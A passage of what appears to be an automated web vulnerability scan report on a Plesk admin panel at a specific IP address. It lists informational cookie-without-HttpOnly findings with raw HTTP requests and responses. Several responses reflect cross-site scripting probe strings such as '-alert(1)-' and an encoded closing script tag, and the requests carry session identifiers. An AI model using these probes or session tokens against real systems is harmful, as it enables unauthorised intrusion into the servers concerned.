Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:48:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:49:05 GMT
Connection: close
Content-Length: 208888

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.52. https://50.22.21.242:8443/admin/server/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/server/tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/tools?context=tools HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/left.php3
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:30:22 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10033

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.53. https://50.22.21.242:8443/admin/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:31:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=49560ed543a561f7ec0d092c; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10183

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.54. https://50.22.21.242:8443/admin/subscription/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/create HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/domain/list?context=domains
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:06 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:07 GMT
Connection: close
Content-Length: 17259

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.55. https://50.22.21.242:8443/admin/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list?context=subscriptions HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: locale=en-US; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:09:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 10103

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.56. https://50.22.21.242:8443/admin/subscription/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:21 GMT
Connection: close
Content-Length: 21006

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.57. https://50.22.21.242:8443/admin/subscription/login/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:35:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home%0052142%22%3B9d7ab8babb3; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10445

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.58. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:36:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home173d0%22-alert%281%29-%22741acbedf90; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10202

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.59. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:38:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homefcda7%255c%2522%253bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10206

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.60. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:38:40 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homefcda7%255c%2522%253bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10216

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.61. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:39:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home%00fcda7%5C%22%3Bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10039

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.62. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:39:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homec8ffe%3C%2Fscript%3Ebfc8c185c3e; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10049

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.63. https://50.22.21.242:8443/admin/update/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; sessionID=lykgulggyjhxxnmnqkvlfkym

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:20:40 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions6a50f%2522%253e%253ca%253ece58ca4e6f; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:20:41 GMT
Connection: close
Content-Length: 9722

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.64. https://50.22.21.242:8443/admin/update/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/server/preferences/
